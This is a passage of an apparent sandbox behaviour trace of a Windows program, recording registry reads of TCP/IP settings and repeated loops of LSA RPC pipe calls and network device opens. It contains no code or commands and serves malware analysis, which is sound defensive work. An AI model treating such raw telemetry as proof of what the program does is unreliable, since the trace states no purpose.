HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
System Activities:
+ System information set
System info class Data Completion Count Source Address
TimeAdjustmentInformation 0000000001420F00 success or wait 10 4029AA
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 11 409989
+ Chronological sections
Operation Data Completion Time
System info queried Type: ProcessInformation success or wait 2031069892
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2031130207
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2031204357
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B3 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 2031211489
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2031213355
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9........px..K..p..X.'.................................CF..w.tC..2............................ pending 2031544448
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,......................px..K..p..X.' pending 2031556006
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033546096
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033546889
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033550767
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2033565311
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2033566318
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2033567798
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033568843
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033577540
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2035780425
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2035780978
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2035799094
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2035815609
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2035817438
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2035818235
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2059079663
System info queried Type: ProcessInformation success or wait 2071619742
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2071654752
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2071658590
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B5 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 2071661607
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2071669741
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9........!.Q.@.\_.Z7.I.................................CF..w.tC..2............................ pending 2071675810
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,......................!.Q.@.\_.Z7.I pending 2071682316
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071772952
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071773494
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071781819
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2071832312
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2071832855
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2071833512
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071834233
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071837996
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2072704299
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2072704853
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2072705461
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2072706089
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2072707612
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2072708956
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2094875830
System info queried Type: ProcessInformation success or wait 2108482103
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2108515167
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2108518479
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 BA 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2108521134
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2108522808
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9...........PD.[....NX.................................CF..w.tC..2............................ pending 2108530050
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,.........................PD.[....NX pending 2108550909
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108678212
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108678609
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108679727
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2108685896
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2108686382
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2108686859
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108687500
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108688992
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2108729668
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2108730161
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2108730653
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2108731212
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2108732493
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2108733629
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2130670689
System info queried Type: ProcessInformation success or wait 2144529845
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2144589809
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2144607306
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FB 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2144620480
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2144624811
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9......S.e.#.E.....{...................................CF..w.tC..2............................ pending 2144637522
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,....................S.e.#.E.....{.. pending 2144644023
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144802010
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144802450
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144803673
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2144810424
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2144810957
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2144811477
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144812051
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144813350
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2144859139
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2144859681
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2144860222
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2144860831
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2144862238
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2144863502
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2166466003
System info queried Type: ProcessInformation success or wait 2180628597
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2180661991
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2180665971
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FC 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2180668868
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2180670601
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9........[.v.L.)...}r..................................CF..w.tC..2............................ pending 2180676920
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,......................[.v.L.)...}r. pending 2180683325
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180771143
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180771589
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180772931
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2180780000
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2180780532
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2180781058
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180781761
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180784548
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2180829667
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2180830210
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2180830756
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2180831369
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2180832782
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2180834041
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2202261560
System info queried Type: ProcessInformation success or wait 2216681011
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2216751754
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2216755362
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FE 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2216758261
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2216760105
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.......P./.}O.].Q. ...................................CF..w.tC..2............................ pending 2216765962
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,.....................P./.}O.].Q. .. pending 2216772400
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216882212
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216882663
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216883901
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2216890704
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2216891241
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2216891769
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216892478
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2216893716
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2216942183
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2216942728
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2216943274
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2216943889
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2216945302
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2216946573
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2238080596
System info queried Type: ProcessInformation success or wait 2252746445
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2252781967
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2252802094
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 09 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 05 success or wait 2252805018
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2252806867
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.....R..W.uNN.".9..\G.................................CF..w.tC..2............................ pending 2252812721
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,...................R..W.uNN.".9..\G pending 2252819204
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253069847
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253070298
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253071533
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2253078281
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2253078817
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2253079441
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253080103
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2253081347
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2253127764
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2253128307
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2253128853
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2253129469
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2253130893
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2253132153
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2273927029
System info queried Type: ProcessInformation success or wait 2288951236
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2289029124
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2289032768
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 46 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2289035664
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2289037496
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9.....>....{OJ...FZ.(..................................CF..w.tC..2............................ pending 2289043447
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,...................>....{OJ...FZ.(. pending 2289049767
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289162029
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289162494
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289163729
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2289170483
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2289171029
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2289171557
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289172263
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2289173558
